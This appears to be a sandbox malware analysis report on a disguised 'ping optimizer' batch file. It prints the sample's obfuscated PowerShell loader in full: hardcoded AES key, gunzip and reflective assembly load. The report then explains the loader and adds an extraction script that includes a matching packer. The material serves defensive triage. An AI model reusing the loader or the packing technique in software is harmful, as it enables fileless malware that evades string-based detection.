Analysis
  Max time kernel: 57s
  Max time network: 18s
  Platform: windows7_x64
  Resource: win7-20231215-en
  Resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  Submitted: 09/01/2024, 11:03
  Static task: static1
  Behavioral task: behavioral1
  Sample: PingOptimizerMain.bat
  Resource: win7-20231215-en
  5 signatures, 150 seconds
General
  Target: PingOptimizerMain.bat
  Size: 11.7MB
  MD5: ffc97bdf56ecbee34e263c88f330a9fd
  SHA1: 7f83beb8534cdc3f3ee2147e74d6f698812f2859
  SHA256: d63b1658179ccc4b45c7f9726b83e32763850a046480b76a8f8920c709309b3e
  SHA512: 09a9dbf6d13297a89ea4d1dbe56ae8f4485ecb832b8fe4cf302d805aa1077ed496e1e84024014ad2238b937fd09c21067112bf52aec373deaf4c20df51ae85c1
  SSDEEP: 49152:zA8wtTTWxiw/n2WZfp8Nuw3PdwARNLfKu5LTEgwJt/eYr8ZLYY3GU80pJzgN5Vsi:X
Score
1/10
Malware Config
Signatures
  Suspicious behavior: EnumeratesProcesses (33 IoCs)
    pid 2464 powershell.exe (1 event); pid 2960 taskmgr.exe (32 events)
  Suspicious use of AdjustPrivilegeToken (2 IoCs)
    Token SeDebugPrivilege: pid 2464 powershell.exe; pid 2960 taskmgr.exe
  Suspicious use of FindShellTrayWindow (58 IoCs)
    pid 2960 taskmgr.exe (58 events)
  Suspicious use of SendNotifyMessage (58 IoCs)
    pid 2960 taskmgr.exe (58 events)
  Suspicious use of WriteProcessMemory (6 IoCs)
    pid 2632 cmd.exe wrote to memory of 2516 (procid_target 29), 3 events
    pid 2632 cmd.exe wrote to memory of 2464 (procid_target 30), 3 events
Processes
  [PID 2632] C:\Windows\system32\cmd.exe  (depth 1)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat"
    Signatures: Suspicious use of WriteProcessMemory
    [PID 2516] C:\Windows\system32\cmd.exe  (depth 2, child of 2632)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "
      Signatures: none
    [PID 2464] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 2, child of 2632)
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  [PID 2960] C:\Windows\system32\taskmgr.exe  (depth 1, separate tree root, not a child of the sample's cmd.exe)
    Command line: "C:\Windows\system32\taskmgr.exe" /4
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage

What the captured command line does

The two depth-2 children of cmd.exe 2632 are siblings, which is how cmd.exe executes a pipeline inside a batch file: the left-hand side (echo <script>) runs in a child cmd.exe /S /D /c"...", and the right-hand side is the receiving process. Here the receiver is powershell.exe -ep bypass -noprofile -windowstyle hidden, which carries no script on its own command line and reads the echoed script from standard input. The six WriteProcessMemory IoCs are cmd.exe 2632 setting up those two children (three writes each), not an injection into a foreign process.

Stripped of its obfuscation, the echoed PowerShell script is a three-stage in-memory loader:

  1. JKKyH: AES decrypt. Mode CBC, PKCS7 padding, key base64 26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI= (32 bytes, so AES-256), IV base64 It4ny7WARKm8v2w/mmx4aw== (16 bytes). Key and IV are hardcoded; nothing is fetched from the network, which matches the 18s of network activity.
  2. HyrXz: gunzip the decrypted bytes through a GZipStream in Decompress mode.
  3. LrqQP: [System.Reflection.Assembly]::Load([byte[]]) on the result, then invoke the assembly's EntryPoint with a single string[] argument containing the path of the .bat itself. The payload is a .NET assembly that never touches disk.

The input is the .bat file itself: the script reads C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat with File.ReadAllText, splits it into lines, takes the first line that begins with the marker SIROXEN, and treats everything after the 7-character marker as base64 ciphertext. The 11.7 MB file size is consistent with a large payload stored on that line.

The obfuscation is string-stuffing: the method and type names FromBase64String, ReadAllText, Load, Reflection and the whole GZipStream constructor are spelled with interleaved @ or # characters and reassembled at runtime with .Replace("@", "") / .Replace('#', ''), then executed via Invoke-Expression or the ::("name") dynamic member syntax. None of the sensitive tokens appears literally in the command line, which is why a simple string match on Assembly.Load or FromBase64String will not fire on it. Variable and function names (JKKyH, HyrXz, LrqQP, CkPBl, ...) are random and carry no meaning.

Two caveats on reading the score of 1/10. First, none of the five signatures covers the reflective assembly load, the hardcoded-key AES decryption, or the self-reading of the .bat; they are generic API-usage signatures. Second, almost all of the listed IoCs are attributed to taskmgr.exe 2960, which sits at depth 1 as its own tree root rather than under the sample's cmd.exe; enumerating processes, finding the shell tray window, sending notify messages and holding SeDebugPrivilege are Task Manager's normal behaviour and say nothing about the sample. The behaviour that matters is the single powershell.exe with an empty command line and SeDebugPrivilege, fed over stdin by a sibling cmd.exe echo.
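The following is an added example, not code from the sample or from tria.ge. It re-implements the loader's unpack chain (marker line -> base64 -> AES-256-CBC/PKCS7 -> gunzip) in a safe direction: it writes the recovered payload to disk for static triage instead of passing it to Assembly.Load, and reports whether the result starts with an MZ header as a .NET assembly would. The key, IV and SIROXEN marker are the constants visible in the captured command line above. Because the real payload line is not on this page, the round-trip demo at the bottom builds its own small test .bat around a constructed dummy payload using the same parameters; the function names (Get-SiroxenPayload, Save-SiroxenPayload, New-SiroxenTestBat, New-Aes) are this example's own.

```powershell
# Added example: safe re-implementation of the observed unpack chain. Constants below are
# the ones hardcoded in the captured loader; everything else is this example's own code.
$Key    = [Convert]::FromBase64String('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI=')  # 32 bytes -> AES-256
$IV     = [Convert]::FromBase64String('It4ny7WARKm8v2w/mmx4aw==')                      # 16 bytes
$Marker = 'SIROXEN'

function New-Aes {
    # Same cipher parameters the loader configures: AES, CBC, PKCS7, fixed key and IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    return $aes
}

function Get-SiroxenPayload {
    # Returns the decrypted, decompressed payload bytes embedded in a loader-style .bat.
    param([Parameter(Mandatory)][string]$BatPath)

    # Step 1: the scan the loader performs on itself - first line starting with the marker,
    # everything after the 7-character marker is base64 ciphertext.
    $line = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $line) { throw "No line starting with '$Marker' in $BatPath" }
    $cipher = [Convert]::FromBase64String($line.Substring($Marker.Length))

    # Step 2: AES-CBC decrypt with the hardcoded key/IV.
    $aes = New-Aes
    $dec = $aes.CreateDecryptor()
    try     { $gz = $dec.TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }

    # Step 3: gunzip. The loader hands these bytes to [Reflection.Assembly]::Load; we stop here.
    $in  = New-Object System.IO.MemoryStream(,$gz)
    $out = New-Object System.IO.MemoryStream
    $gzs = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $gzs.CopyTo($out)
    $gzs.Dispose(); $in.Dispose()
    $bytes = $out.ToArray()
    $out.Dispose()
    return ,$bytes   # leading comma stops PowerShell from unrolling the byte[]
}

function Save-SiroxenPayload {
    # Writes the payload to $OutPath and returns a small triage record (size, MZ check, SHA256).
    param([Parameter(Mandatory)][string]$BatPath, [Parameter(Mandatory)][string]$OutPath)
    $bytes = Get-SiroxenPayload -BatPath $BatPath
    # A .NET assembly is a PE file, so a genuine payload starts with 'MZ' (0x4D 0x5A).
    $isPe = ($bytes.Length -ge 2) -and ($bytes[0] -eq 0x4D) -and ($bytes[1] -eq 0x5A)
    [System.IO.File]::WriteAllBytes($OutPath, $bytes)
    $sha = [BitConverter]::ToString([System.Security.Cryptography.SHA256]::Create().ComputeHash($bytes)).Replace('-', '').ToLower()
    [pscustomobject]@{ Path = $OutPath; Bytes = $bytes.Length; LooksLikePE = $isPe; SHA256 = $sha }
}

# --- Round-trip demo with a constructed dummy payload (not the sample's real payload) ---
function New-SiroxenTestBat {
    # Reverse of Get-SiroxenPayload: gzip -> AES encrypt -> base64 -> marker line in a .bat.
    param([Parameter(Mandatory)][string]$BatPath, [Parameter(Mandatory)][byte[]]$Payload)
    $ms  = New-Object System.IO.MemoryStream
    $gzs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
    $gzs.Write($Payload, 0, $Payload.Length)
    $gzs.Dispose()                      # flushes and closes $ms; ToArray still works on a closed MemoryStream
    $gz  = $ms.ToArray()
    $aes = New-Aes
    $enc = $aes.CreateEncryptor()
    try     { $cipher = $enc.TransformFinalBlock($gz, 0, $gz.Length) }
    finally { $enc.Dispose(); $aes.Dispose() }
    $b64 = [Convert]::ToBase64String($cipher)
    @('@echo off', 'rem decoy batch text before the payload line', "$Marker$b64") |
        Set-Content -LiteralPath $BatPath -Encoding ASCII
}

$tmpBat = Join-Path $env:TEMP 'siroxen-demo.bat'
$tmpOut = Join-Path $env:TEMP 'siroxen-demo.bin'
# Constructed dummy payload: an 'MZ' prefix plus filler so the PE check has something to pass on.
$dummy = [System.Text.Encoding]::ASCII.GetBytes('MZ' + ('constructed dummy payload, not a real assembly ' * 8))
New-SiroxenTestBat -BatPath $tmpBat -Payload $dummy
$result = Save-SiroxenPayload -BatPath $tmpBat -OutPath $tmpOut
$result | Format-List
$readback = [System.IO.File]::ReadAllBytes($tmpOut)
if ([Convert]::ToBase64String($dummy) -ne [Convert]::ToBase64String($readback)) { throw 'round trip failed' }
```

Run it in an isolated analysis VM against a copy of the .bat (Save-SiroxenPayload -BatPath .\PingOptimizerMain.bat -OutPath .\payload.dll); it only decrypts and writes, never loads or invokes anything. If LooksLikePE comes back false, either the marker line is not the one the loader uses or the key/IV differ from this build. The constants are taken from this sample alone, and other droppers of the same family are not guaranteed to share them, so extract them from each sample's command line rather than reusing these.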